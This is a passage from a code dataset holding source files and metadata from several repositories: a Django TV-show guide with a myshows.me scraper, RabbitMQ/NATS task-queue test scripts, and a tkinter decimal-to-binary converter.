"max_line_length": 208,
"num_lines": 305,
"path": "/ltlf2dfa/Translator.py",
"repo_name": "francescofuggitti/LTLf2DFA",
"src_encoding": "UTF-8",
"text": "from ltlf2dfa.Parser import MyParser\nimport itertools as it\nimport subprocess\nimport os, sys, re\nimport pkg_resources\n\nclass Translator:\n\n def __init__(self, formula):\n self.headerMona = \"m2l-str;\\n\"\n self.alphabet = []\n self.formula_to_be_parsed = formula\n self.formulaType = self.search_mixed_formula()\n self.parsed_formula = None\n self.translated_formula = None\n\n def formula_parser(self):\n if self.formulaType in {1,2,3}:\n self.compute_alphabet()\n parser = MyParser()\n self.parsed_formula = parser(self.formula_to_be_parsed)\n else: raise ValueError('Ooops! You typed a formula with mixed past/future operators')\n\n def tuple_to_string(self):\n return '_'.join(str(self.formula_to_be_parsed))\n\n def search_mixed_formula(self):\n '''\n search_mixed_formula() possible outputs:\n 0: formula is mixed\n 1: formula is only future\n 2: formula is only past\n 3: formula is only present\n '''\n formula_to_check_str = self.tuple_to_string()\n separated_formula = formula_to_check_str.split('_')\n\n past_operators = []\n future_operators = []\n for character in separated_formula:\n if character.isupper():\n if character in {'X','F','G','U', 'W', 'R'}: future_operators.append(character)\n elif character in {'Y','O','H','S'}: past_operators.append(character)\n else: continue\n else: continue\n\n if not past_operators and future_operators:\n return 1\n elif past_operators and not future_operators:\n return 2\n elif not past_operators and not future_operators:\n return 3\n else:\n return 0\n\n def rem_duplicates_order(self, seq):\n seen = set()\n seen_add = seen.add\n return [x for x in seq if not (x in seen or seen_add(x))]\n\n def compute_alphabet(self):\n\n symbols = re.findall('(?<![a-z])(?!true|false)[_a-z0-9]+', str(self.formula_to_be_parsed))\n _symbols = self.rem_duplicates_order(symbols)\n self.alphabet = [character.upper() for character in _symbols]\n\n def compute_declare_assumption(self):\n pairs = list(it.combinations(self.alphabet, 2))\n\n if pairs:\n first_assumption = \"~(ex1 y: 0<=y & y<=max($) & ~(\"\n for symbol in self.alphabet:\n if symbol == self.alphabet[-1]: first_assumption += 'y in '+ symbol +'))'\n else : first_assumption += 'y in '+ symbol +' | '\n\n second_assumption = \"~(ex1 y: 0<=y & y<=max($) & ~(\"\n for pair in pairs:\n if pair == pairs[-1]: second_assumption += '(y notin '+ pair[0]+' | y notin '+pair[1]+ ')));'\n else: second_assumption += '(y notin '+ pair[0]+' | y notin '+pair[1]+ ') & '\n\n return first_assumption +' & '+ second_assumption\n else:\n return None\n\n def translate(self):\n self.translated_formula = translate_bis(self.parsed_formula, self.formulaType, var='v_0')+\";\\n\"\n\n def buildMonaProgram(self, flag_for_declare):\n if not self.alphabet and not self.translated_formula:\n raise ValueError\n else:\n if flag_for_declare:\n if self.compute_declare_assumption() is None:\n if self.alphabet:\n return self.headerMona + 'var2 ' + \", \".join(self.alphabet) + ';\\n' + self.translated_formula\n else:\n return self.headerMona + self.translated_formula\n else: return self.headerMona + 'var2 ' + \", \".join(self.alphabet) + ';\\n' + self.translated_formula + self.compute_declare_assumption()\n else:\n if self.alphabet:\n return self.headerMona + 'var2 ' + \", \".join(self.alphabet) + ';\\n' + self.translated_formula\n else:\n return self.headerMona + self.translated_formula\n\n def createMonafile(self, flag):\n program = self.buildMonaProgram(flag)\n try:\n with open('./automa.mona', 'w+') as file:\n file.write(program)\n 
file.close()\n except IOError:\n print('Problem with the opening of the file!')\n\n def invoke_mona(self, path='./inter-automa'):\n if sys.platform == 'linux':\n package_dir = os.path.dirname(os.path.abspath(__file__))\n mona_path = pkg_resources.resource_filename('ltlf2dfa','mona')\n if os.access(mona_path, os.X_OK): # check if mona is executable\n try:\n subprocess.call(package_dir+'/./mona -u -gw ./automa.mona > ' + path + '.dot', shell=True)\n except subprocess.CalledProcessError as e:\n print(e)\n exit()\n except OSError as e:\n print(e)\n exit()\n else:\n print('[ERROR]: MONA tool is not executable...')\n exit()\n else:\n try:\n subprocess.call('mona -u -gw ./automa.mona > ' + path + '.dot', shell=True)\n except subprocess.CalledProcessError as e:\n print(e)\n exit()\n except OSError as e:\n print(e)\n exit()\n\ndef translate_bis(formula_tree, _type, var):\n if type(formula_tree) == tuple:\n #enable this print to see the tree pruning\n # print(self.parsed_formula)\n # print(var)\n if formula_tree[0] == '&':\n # print('computed tree: '+ str(self.parsed_formula))\n if var == 'v_0':\n if _type == 2:\n a = translate_bis(formula_tree[1], _type, 'max($)')\n b = translate_bis(formula_tree[2], _type, 'max($)')\n else:\n a = translate_bis(formula_tree[1], _type, '0')\n b = translate_bis(formula_tree[2], _type, '0')\n else:\n a = translate_bis(formula_tree[1], _type, var)\n b = translate_bis(formula_tree[2], _type, var)\n if a == 'false' or b == 'false':\n return 'false'\n elif a == 'true':\n if b == 'true': return 'true'\n else: return b\n elif b == 'true': return a\n else: return '('+a+' & '+b+')'\n elif formula_tree[0] == '|':\n # print('computed tree: '+ str(self.parsed_formula))\n if var == 'v_0':\n if _type == 2:\n a = translate_bis(formula_tree[1], _type, 'max($)')\n b = translate_bis(formula_tree[2], _type, 'max($)')\n else:\n a = translate_bis(formula_tree[1], _type, '0')\n b = translate_bis(formula_tree[2], _type, '0')\n else:\n a = translate_bis(formula_tree[1], _type, var)\n b = translate_bis(formula_tree[2], _type, var)\n if a == 'true' or b == 'true':\n return 'true'\n elif a == 'false':\n if b == 'true': return 'true'\n elif b == 'false': return 'false'\n else: return b\n elif b == 'false': return a\n else: return '('+a+' | '+b+')'\n elif formula_tree[0] == '~':\n # print('computed tree: '+ str(self.parsed_formula))\n if var == 'v_0':\n if _type == 2:\n a = translate_bis(formula_tree[1], _type, 'max($)')\n else:\n a = translate_bis(formula_tree[1], _type, '0')\n else: a = translate_bis(formula_tree[1], _type, var)\n if a == 'true': return 'false'\n elif a == 'false': return 'true'\n else: return '~('+ a +')'\n elif formula_tree[0] == 'X':\n # print('computed tree: '+ str(self.parsed_formula))\n new_var = _next(var)\n a = translate_bis(formula_tree[1], _type, new_var)\n if var == 'v_0':\n return '('+ 'ex1 '+new_var+': '+ new_var +' = 1 '+ '& '+ a +')'\n else:\n return '('+ 'ex1 '+new_var+': '+ new_var +' = '+ var + ' + 1 '+ '& '+ a +')'\n elif formula_tree[0] == 'U':\n # print('computed tree: '+ str(self.parsed_formula))\n new_var = _next(var)\n new_new_var = _next(new_var)\n a = translate_bis(formula_tree[2], _type,new_var)\n b = translate_bis(formula_tree[1], _type,new_new_var)\n\n if var == 'v_0':\n if b == 'true': return '( '+ 'ex1 '+new_var+': 0 <= '+new_var+' & '+new_var+' <= max($) & '+ a +' )'\n elif a == 'true': return '( '+ 'ex1 '+new_var+': 0 <= '+new_var+' & '+new_var+' <= max($) & all1 '+new_new_var+': 0 <= '+new_new_var+' & '+new_new_var+' < '+new_var+' => '+b+' 
)'\n elif a == 'false': return 'false'\n else: return '( '+ 'ex1 '+new_var+': 0 <= '+new_var+' & '+new_var+' <= max($) & '+ a +' & all1 '+new_new_var+': 0 <= '+new_new_var+' & '+new_new_var+' < '+new_var+' => '+b+' )'\n else:\n if b == 'true': return '( '+ 'ex1 '+new_var+': '+var+' <= '+new_var+' & '+new_var+' <= max($) & '+ a +' )'\n elif a == 'true': return '( '+ 'ex1 '+new_var+': '+var+' <= '+new_var+' & '+new_var+' <= max($) & all1 '+new_new_var+': '+var+' <= '+new_new_var+' & '+new_new_var+' < '+new_var+' => '+b+' )'\n elif a == 'false': return 'false'\n else: return '( '+ 'ex1 '+new_var+': '+var+' <= '+new_var+' & '+new_var+' <= max($) & '+ a +' & all1 '+new_new_var+': '+var+' <= '+new_new_var+' & '+new_new_var+' < '+new_var+' => '+b+' )'\n\n elif formula_tree[0] == 'W':\n new_var = _next(var)\n a = translate_bis(formula_tree[1], _type, new_var)\n if var == 'v_0':\n return '(0 = max($)) | ('+ 'ex1 '+new_var+': '+ new_var +' = 1 '+ '& '+ a +')'\n else:\n return '('+ var +' = max($)) | ('+ 'ex1 '+new_var+': '+ new_var +' = '+ var + ' + 1 '+ '& '+ a +')'\n\n elif formula_tree[0] == 'R':\n new_var = _next(var)\n new_new_var = _next(new_var)\n a = translate_bis(formula_tree[2], _type,new_new_var)\n b = translate_bis(formula_tree[1], _type,new_var)\n\n if var == 'v_0':\n if b == 'true': return '( '+ 'ex1 '+new_var+': 0 <= '+new_var+' & '+new_var+' <= max($) & all1 '+new_new_var+': 0 <= '+new_new_var+' & '+new_new_var+' <= '+new_var+' => '+a+' ) |'\\\n '(all1 '+new_new_var+': 0 <= '+new_new_var+' & '+new_new_var+' <= max($) => '+a+' )'\n elif a == 'true': return '( '+ 'ex1 '+new_var+': 0 <= '+new_var+' & '+new_var+' <= max($) & '+b+')'\n elif b == 'false': return '(all1 '+new_new_var+': 0 <= '+new_new_var+' & '+new_new_var+' <= max($) => '+a+' )'\n else: return '( '+ 'ex1 '+new_var+': 0 <= '+new_var+' & '+new_var+' <= max($) & '+ b +' & all1 '+new_new_var+': 0 <= '+new_new_var+' & '+new_new_var+' <= '+new_var+' => '+a+' ) |'\\\n '(all1 '+new_new_var+': 0 <= '+new_new_var+' & '+new_new_var+' <= max($) => '+a+' )'\n else:\n if b == 'true': return '( '+ 'ex1 '+new_var+': '+var+' <= '+new_var+' & '+new_var+' <= max($) & all1 '+new_new_var+': '+var+' <= '+new_new_var+' & '+new_new_var+' <= '+new_var+' => '+a+' ) |'\\\n '(all1 '+new_new_var+': '+var+' <= '+new_new_var+' & '+new_new_var+' <= max($) => '+a+' )'\n elif a == 'true': return '( '+ 'ex1 '+new_var+': '+var+' <= '+new_var+' & '+new_var+' <= max($) & '+b+')'\n elif b == 'false': return '(all1 '+new_new_var+': '+var+' <= '+new_new_var+' & '+new_new_var+' <= max($) => '+a+' )'\n else: return '( '+ 'ex1 '+new_var+': '+var+' <= '+new_var+' & '+new_var+' <= max($) & '+ b +' & all1 '+new_new_var+': '+var+' <= '+new_new_var+' & '+new_new_var+' <= '+new_var+' => '+a+' ) |'\\\n '(all1 '+new_new_var+': '+var+' <= '+new_new_var+' & '+new_new_var+' <= max($) => '+a+' )'\n\n elif formula_tree[0] == 'Y':\n # print('computed tree: '+ str(self.parsed_formula))\n new_var = _next(var)\n a = translate_bis(formula_tree[1], _type,new_var)\n if var == 'v_0':\n return '('+ 'ex1 '+new_var+': '+ new_var +' = max($) - 1 '+ '& max($) > 0 & '+ a +')'\n else:\n return '('+ 'ex1 '+new_var+': '+ new_var +' = '+ var + ' - 1 '+ '& '+new_var+' > 0 & '+ a +')'\n elif formula_tree[0] == 'S':\n # print('computed tree: '+ str(self.parsed_formula))\n new_var = _next(var)\n new_new_var = _next(new_var)\n a = translate_bis(formula_tree[2], _type,new_var)\n b = translate_bis(formula_tree[1], _type,new_new_var)\n\n if var == 'v_0':\n if b == 'true': return '( '+ 'ex1 '+new_var+': 0 
<= '+new_var+' & '+new_var+' <= max($) & '+ a +' )'\n elif a == 'true': return '( '+ 'ex1 '+new_var+': 0 <= '+new_var+' & '+new_var+' <= max($) & all1 '+new_new_var+': '+new_var+' < '+new_new_var+' & '+new_new_var+' <= max($) => '+b+' )'\n elif a == 'false': return 'false'\n else: return '( '+ 'ex1 '+new_var+': 0 <= '+new_var+' & '+new_var+' <= max($) & '+ a +' & all1 '+new_new_var+': '+new_var+' < '+new_new_var+' & '+new_new_var+' <= max($) => '+b+' )'\n else:\n if b == 'true': return '( '+ 'ex1 '+new_var+': 0 <= '+new_var+' & '+new_var+' <= max($) & '+ a +' )'\n elif a == 'true': return '( '+ 'ex1 '+new_var+': 0 <= '+new_var+' & '+new_var+' <= '+var+' & all1 '+new_new_var+': '+new_var+' < '+new_new_var+' & '+new_new_var+' <= '+var+' => '+b+' )'\n elif a == 'false': return 'false'\n else: return '( '+ 'ex1 '+new_var+': 0 <= '+new_var+' & '+new_var+' <= '+var+' & '+ a +' & all1 '+new_new_var+': '+new_var+' < '+new_new_var+' & '+new_new_var+' <= '+var+' => '+b+' )'\n else:\n # handling non-tuple cases\n if formula_tree == 'true': return 'true'\n elif formula_tree == 'false': return 'false'\n\n # enable if you want to see recursion\n # print('computed tree: '+ str(self.parsed_formula))\n\n # BASE CASE OF RECURSION\n else:\n if var == 'v_0':\n if _type == 2:\n return 'max($) in '+ formula_tree.upper()\n else:\n return '0 in '+ formula_tree.upper()\n else:\n return var + ' in ' + formula_tree.upper()\n # if formula_tree.isalpha():\n # if var == 'v_0':\n # return '0 in '+ formula_tree.upper()\n # else:\n # return var + ' in ' + formula_tree.upper()\n # else:\n # return var + ' in ' + formula_tree.upper()\n\ndef _next(var):\n if var == '0' or var == 'max($)': return 'v_1'\n else:\n s = var.split('_')\n s[1] = str(int(s[1])+1)\n return '_'.join(s)\n"
},
{
"alpha_fraction": 0.5003232359886169,
"alphanum_fraction": 0.5048481225967407,
"avg_line_length": 31.93617057800293,
"blob_id": "1bd260e9fc9ca0019e86908b09a011aa288efe61",
"content_id": "d1cdcb4b41bcfb096643b2e65c09868c959595da",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1547,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 47,
"path": "/ltlf2dfa/DotHandler.py",
"repo_name": "francescofuggitti/LTLf2DFA",
"src_encoding": "UTF-8",
"text": "from dotpy.parser.parser import MyParser\nimport os\n\nclass DotHandler:\n\n def __init__(self, path='./inter-automa.dot'):\n self.dot_path = path\n self.new_digraph = None\n\n def modify_dot(self):\n if os.path.isfile(self.dot_path):\n parser = MyParser()\n with open(self.dot_path, 'r') as f:\n dot = f.read()\n f.close()\n\n graph = parser(dot)\n if not graph.is_singleton():\n graph.delete_node('0')\n graph.delete_edge('init', '0')\n graph.delete_edge('0', '1')\n graph.add_edge('init', '1')\n else:\n graph.delete_edge('init', '0')\n graph.add_edge('init', '0')\n self.new_digraph = graph\n else:\n print('[ERROR] - No file DOT exists')\n exit()\n\n def delete_intermediate_automaton(self):\n if os.path.isfile(self.dot_path):\n os.remove(self.dot_path)\n return True\n else:\n return False\n\n def output_dot(self, result_path='./automa.dot'):\n try:\n if self.delete_intermediate_automaton():\n with open(result_path, 'w+') as f:\n f.write(str(self.new_digraph))\n f.close()\n else:\n raise IOError('[ERROR] - Something wrong occurred in the elimination of intermediate automaton.')\n except IOError:\n print('[ERROR] - Problem with the opening of the file %s!' %result_path)"
},
{
"alpha_fraction": 0.6556694507598877,
"alphanum_fraction": 0.6707239151000977,
"avg_line_length": 28.733333587646484,
"blob_id": "7be54af3935a44feb8a633169a16f3f2b59c231b",
"content_id": "d7175a4849abba515dfc5d093287c054ecb68d0e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3122,
"license_type": "permissive",
"max_line_length": 244,
"num_lines": 105,
"path": "/README.md",
"repo_name": "francescofuggitti/LTLf2DFA",
"src_encoding": "UTF-8",
"text": "# LTL<sub>f</sub>2DFA\n[]()\n\nLTL<sub>f</sub>2DFA is a simple tool that processes an LTL<sub>f</sub> formula (with all past or all future operators) and generates the corresponding minimized DFA (Deterministic Finite state Automaton) using [MONA](http://www.brics.dk/mona/).\nThis tool is written in Python 3.6.\n\nIt is tested on Linux Ubuntu 16.04 and on macOS 10.13.6.\n\nNow it is also available online at [ltlf2dfa.diag.uniroma1.it](http://ltlf2dfa.diag.uniroma1.it).\n\n## Getting Started\n\n### Requirements\n\nThis tool uses MONA for the generation of the DFA. Hence, you should first install MONA with all its dependencies on your OS following the instructions [here](http://www.brics.dk/mona/download.html).\n\nThis tool is also based on the following libraries:\n\n- [ply 3.11](https://pypi.org/project/ply/)\n- [dotpy 0.0.2](https://pypi.org/project/dotpy/)\n\nThey are automatically added while installing LTL<sub>f</sub>2DFA.\n\n## How To Install It\n\n- From PyPI:\n```\npip install ltlf2dfa\n```\n- From this repository:\n```\npip install git+https://github.com/Francesco17/LTLf2DFA@master#egg=ltlf2dfa\n```\n\n## How To Use It\n\n- Simply parse an LTL<sub>f</sub> formula with past or future operators:\n```python\nfrom ltlf2dfa.Parser import MyParser\n\nformula = \"G(a->Xb)\"\nparser = MyParser()\nparsed_formula = parser(formula)\n\nprint(parsed_formula)\n```\n- Translate an LTL<sub>f</sub> formula to the corresponding DFA automaton:\n```python\nfrom ltlf2dfa.Translator import Translator\nfrom ltlf2dfa.DotHandler import DotHandler\n\nformula = \"G(a->Xb)\"\ndeclare_flag = False #True if you want to compute DECLARE assumption for the formula\n\ntranslator = Translator(formula)\ntranslator.formula_parser()\ntranslator.translate()\ntranslator.createMonafile(declare_flag) #it creates automa.mona file\ntranslator.invoke_mona() #it returns an intermediate automa.dot file\n\ndotHandler = DotHandler()\ndotHandler.modify_dot()\ndotHandler.output_dot() #it returns the final automa.dot file\n```\n## Syntax\n\nThe syntax accepted by LTL<sub>f</sub>2DFA is the following:\n\n| OPERATOR | SYMBOL |\n|:-------------:|:------:|\n| TRUE | true |\n| FALSE | false |\n| AND | & |\n| OR | \\| |\n| NOT | ~ |\n| IMPLICATION | -> |\n| D-IMPLICATION | <-> |\n| NEXT | X |\n| UNTIL | U |\n| EVENTUALLY | F |\n| GLOBALLY | G |\n| WEAK NEXT | W |\n| RELEASE | R |\n| YESTERDAY (*) | Y |\n| SINCE (*) | S |\n| ONCE (*) | O |\n| GLOBALLY (*) | H |\n\n(*) are PAST operators.\n\nAlso parentheses `(` and `)` can be used.\n\n**NOTE**: LTL<sub>f</sub>2DFA accepts ONLY separated formulas, i.e. formulas that have only past, only future or none operators.\n\n## Author\n\n[Francesco Fuggitti](https://www.linkedin.com/in/francesco-fuggitti-b78336131/)\n\n## License\n\nThis project is licensed under the MIT License - see the [LICENSE](https://github.com/Francesco17/LTLf2FOL/blob/master/LICENSE) file for details\n\n## Contacts\n\nIf, for any reason, you are interested in feel free to contact me by email.\n"
},
{
"alpha_fraction": 0.6161417365074158,
"alphanum_fraction": 0.6318897604942322,
"avg_line_length": 30.78125,
"blob_id": "e76e4cf19b96b97a736162fc10e6040d68a29b1c",
"content_id": "4ffcec557a2b6276583da4915ee2487c79531e82",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1016,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 32,
"path": "/setup.py",
"repo_name": "francescofuggitti/LTLf2DFA",
"src_encoding": "UTF-8",
"text": "from setuptools import setup, find_packages\n\nwith open('README.md') as readme_file:\n readme = readme_file.read()\n\nrequirements = ['ply', 'dotpy']\n\nsetup(\n author=\"Francesco Fuggitti\",\n author_email='[email protected]',\n classifiers=[\n 'Development Status :: 1 - Planning',\n 'Intended Audience :: Education',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Operating System :: POSIX :: Linux',\n ],\n description=\"A tool for generating a DFA from an LTLf formula\",\n install_requires=requirements,\n license=\"MIT license\",\n long_description=readme,\n long_description_content_type=\"text/markdown\",\n include_package_data=True,\n keywords='ltlf2dfa',\n name='ltlf2dfa',\n packages=find_packages(include=['ltlf2dfa*']),\n url='https://github.com/Francesco17/LTLf2DFA',\n version='0.2.2.post0',\n)"
},
{
"alpha_fraction": 0.45499080419540405,
"alphanum_fraction": 0.4574402868747711,
"avg_line_length": 23.388059616088867,
"blob_id": "c8ddbd527839707608bfb485b499c8573eecff42",
"content_id": "d823746911c7cd4865d3f577e727f0d13ea281c7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1633,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 67,
"path": "/ltlf2dfa/Lexer.py",
"repo_name": "francescofuggitti/LTLf2DFA",
"src_encoding": "UTF-8",
"text": "import ply.lex as lex\n\nclass MyLexer(object):\n\n reserved = {\n 'true': 'TRUE',\n 'false': 'FALSE',\n 'X': 'NEXT',\n 'W': 'WEAKNEXT',\n 'R': 'RELEASE',\n 'U': 'UNTIL',\n 'F': 'EVENTUALLY',\n 'G': 'GLOBALLY',\n 'Y': 'PASTNEXT', #PREVIOUS\n 'S': 'PASTUNTIL', #SINCE\n 'O': 'PASTEVENTUALLY', #ONCE\n 'H': 'PASTGLOBALLY'\n }\n # List of token names. This is always required\n tokens = (\n 'TERM',\n 'NOT',\n 'AND',\n 'OR',\n 'IMPLIES',\n 'DIMPLIES',\n 'LPAR',\n 'RPAR'\n ) + tuple(reserved.values())\n\n # Regular expression rules for simple tokens\n t_TRUE = r'true'\n t_FALSE = r'false'\n t_AND = r'\\&'\n t_OR = r'\\|'\n t_IMPLIES = r'\\->'\n t_DIMPLIES = r'\\<->'\n t_NOT = r'\\~'\n t_LPAR = r'\\('\n t_RPAR = r'\\)'\n # FUTURE OPERATORS\n t_NEXT = r'X'\n t_WEAKNEXT = r'W'\n t_RELEASE = r'R'\n t_UNTIL = r'U'\n t_EVENTUALLY = r'F'\n t_GLOBALLY = r'G'\n # PAST OPERATOR\n t_PASTNEXT = r'Y'\n t_PASTUNTIL = r'S'\n t_PASTEVENTUALLY = r'O'\n t_PASTGLOBALLY = r'H'\n\n t_ignore = r' '+'\\n'\n\n def t_TERM(self, t):\n r'(?<![a-z])(?!true|false)[_a-z0-9]+'\n t.type = MyLexer.reserved.get(t.value, 'TERM')\n return t # Check for reserved words\n\n def t_error(self, t):\n print(\"Illegal character '%s' in the input formula\" % t.value[0])\n t.lexer.skip(1)\n\n # Build the lexer\n def build(self,**kwargs):\n self.lexer = lex.lex(module=self, **kwargs)"
},
{
"alpha_fraction": 0.4057142734527588,
"alphanum_fraction": 0.4208163321018219,
"avg_line_length": 32.57534408569336,
"blob_id": "e606a2901527a4b698917659a90b368ed9201c0c",
"content_id": "53295913dc9a489ba8af467439e7f1d8a504b6fc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2450,
"license_type": "permissive",
"max_line_length": 114,
"num_lines": 73,
"path": "/ltlf2dfa/Parser.py",
"repo_name": "francescofuggitti/LTLf2DFA",
"src_encoding": "UTF-8",
"text": "import ply.yacc as yacc\nfrom ltlf2dfa.Lexer import MyLexer\n\nclass MyParser(object):\n\n def __init__(self):\n self.lexer = MyLexer()\n self.lexer.build()\n self.tokens = self.lexer.tokens\n self.parser = yacc.yacc(module=self)\n self.precedence = (\n\n ('nonassoc', 'LPAR', 'RPAR'),\n ('left', 'AND', 'OR', 'IMPLIES', 'DIMPLIES', 'UNTIL', 'RELEASE', 'PASTUNTIL'),\n ('right', 'NEXT', 'WEAKNEXT', 'EVENTUALLY', 'GLOBALLY', 'PASTNEXT', 'PASTEVENTUALLY', 'PASTGLOBALLY'),\n ('right', 'NOT')\n )\n\n def __call__(self, s, **kwargs):\n return self.parser.parse(s, lexer=self.lexer.lexer)\n\n def p_formula(self, p):\n '''\n formula : formula AND formula\n | formula OR formula\n | formula IMPLIES formula\n | formula DIMPLIES formula\n | formula UNTIL formula\n | formula RELEASE formula\n | formula PASTUNTIL formula\n | NEXT formula\n | WEAKNEXT formula\n | EVENTUALLY formula\n | GLOBALLY formula\n | PASTNEXT formula\n | PASTEVENTUALLY formula\n | PASTGLOBALLY formula\n | NOT formula\n | TRUE\n | FALSE\n | TERM\n '''\n\n if len(p) == 2: p[0] = p[1]\n elif len(p) == 3:\n if p[1] == 'F': # eventually A == true UNITL A\n p[0] = ('U','true', p[2])\n elif p[1] == 'G': # globally A == not( eventually (not A) )\n p[0] = ('~',('U', 'true', ('~',p[2])))\n elif p[1] == 'O': # pasteventually A = true SINCE A\n p[0] = ('S','true', p[2])\n elif p[1] == 'H': # pastglobally A == not( pasteventually (not A) )\n p[0] = ('~',('S', 'true', ('~',p[2])))\n else:\n p[0] = (p[1], p[2])\n elif len(p) == 4:\n if p[2] == '->':\n p[0] = ('|', ('~', p[1]), p[3])\n elif p[2] == '<->':\n p[0] = ('&', ('|', ('~', p[1]), p[3]), ('|', ('~', p[3]), p[1]))\n else:\n p[0] = (p[2],p[1],p[3])\n else: raise ValueError\n\n\n def p_expr_group(self, p):\n '''\n formula : LPAR formula RPAR\n '''\n p[0] = p[2]\n\n def p_error(self, p):\n raise ValueError(\"Syntax error in input! %s\" %str(p))"
}
] | 6 |
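Since `p_formula` above rewrites the derived operators into a core set (`F a` becomes `('U', 'true', 'a')`, `G a` becomes `('~', ('U', 'true', ('~', a)))`, and `a -> b` becomes `('|', ('~', a), b)`), the README example should parse to a nested tuple. A quick sketch to confirm against the installed package:

```python
from ltlf2dfa.Parser import MyParser

parser = MyParser()
tree = parser("G(a->Xb)")

# G f is rewritten to ~(true U ~f), and a->Xb to ~a | Xb,
# so the grammar actions above should yield:
expected = ('~', ('U', 'true', ('~', ('|', ('~', 'a'), ('X', 'b')))))
print(tree)
print(tree == expected)
```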
skoricky/partner
|
https://github.com/skoricky/partner
|
10ea7746f1c4b7583f94d68ca9ff51e490275e01
|
43f50d9eeff1d44886a2c2e962fd0ee9c181aef6
|
42aba7c4b791d029ef607dae3d4c7e44ed25af57
|
refs/heads/master
| 2021-04-03T06:13:49.954326 | 2018-03-27T19:28:12 | 2018-03-27T19:28:12 | 124,451,355 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5442177057266235,
"alphanum_fraction": 0.5732426047325134,
"avg_line_length": 34.532257080078125,
"blob_id": "3164f7f573efbe267b481112c56243cd6ba06e88",
"content_id": "153189c48dee3bc2d70a82c79e7317433e86e013",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2520,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 62,
"path": "/model_common_pipe.py",
"repo_name": "skoricky/partner",
"src_encoding": "UTF-8",
"text": "#!bin/python\n# -*- coding: utf-8 -*-\n\nfrom model_density import *\n\nclass model_common_pipe: # pipe model\n\n def __init__(self, pipe_vol=150.0, completed_vol=140.0, out_p=7.0):\n self.pipe_vol = pipe_vol # Общий объем коллектора/трубы, м3\n self.completed_vol = completed_vol # Заполненный объем, м3\n self.density = 1000.0 # Текущая плотность перекачиваемой среды, кг/м3\n self.d_vol = 0.0 # Мгновенный объем, м3\n self.in_vol = [0.0]\n self.out_vol = [0.0]\n\n # Долевые коэффициенты исходящих расходов по характеристике клапанов/арматуры\n # на выходе из коллектора/трубы\n self.__out_vol_k = [0.0]\n\n # Текущее давление в коллекторе/трубе\n self.current_out_p = self.__get_out_p(out_p)\n\n @staticmethod\n def get_current_dencity(t=20):\n _density = density()\n return _density.get_density(t) # Плотность воды от текущей температуры, кг/м3\n\n @staticmethod\n def get_sum_vol(vol):\n return sum((float(vol[i]) for i in range(0, int(len(vol)))))\n\n def get_single_flow(self, vol):\n sum_vol = self.get_sum_vol(vol)\n single_vol = []\n for i in range(0, int(len(vol))):\n if vol[i] < sum_vol / (len(vol) - 1):\n single_vol.append(vol[i])\n else:\n single_vol.append(sum_vol / (len(vol) - 1))\n return single_vol\n\n def __get_out_p(self, out_p):\n if self.get_sum_vol(self.out_vol) > 0.0:\n return out_p\n else:\n return 0.0\n\n def set_out_p(self, out_p):\n self.current_out_p = self.__get_out_p(out_p)\n return self.current_out_p # давление в коллекторе/трубе, МПа\n\n def get_common_vol(self, in_vol, out_vol, dt, t=20): # t = 20 градусов по умолчанию, плотность 1000 кг/м3\n self.density = self.get_current_dencity(t)\n k = 3600.0 / self.density\n d_vol = (self.get_sum_vol(in_vol) - self.get_sum_vol(out_vol))\n vol = self.completed_vol + (self.d_vol + d_vol) / 2 * (dt / 1000) * k\n self.d_vol = d_vol\n\n if vol < self.pipe_vol * 1.01:\n self.completed_vol = vol\n else:\n self.completed_vol = self.pipe_vol * 1.01\n\n\n"
},
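`get_common_vol` above advances the filled volume with a trapezoidal step over the net flow; the `3600 / density` factor suggests the summed flows are treated as per-hour mass rates and `dt` as milliseconds. A numeric sketch of one update with illustrative values:

```python
density = 1000.0                 # kg/m3, water near 20 C
k = 3600.0 / density             # conversion factor used by the class
completed_vol = 140.0            # m3, currently filled volume
d_vol_prev, d_vol = 0.4, 0.6     # previous and current net flow (in - out)
dt = 250.0                       # ms, one solver step (assumed)

# Trapezoidal update, as in get_common_vol:
completed_vol += (d_vol_prev + d_vol) / 2 * (dt / 1000) * k
print(completed_vol)             # 140.0 + 0.5 * 0.25 * 3.6 = 140.45 m3
```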
{
"alpha_fraction": 0.446835994720459,
"alphanum_fraction": 0.5484287738800049,
"avg_line_length": 38.37288284301758,
"blob_id": "e23e3ed96540e78e3bb00058bc52a53a369ad946",
"content_id": "b95017b88288a3f111b2d3d75b3ce74b46240087",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2634,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 59,
"path": "/model_pump.py",
"repo_name": "skoricky/partner",
"src_encoding": "UTF-8",
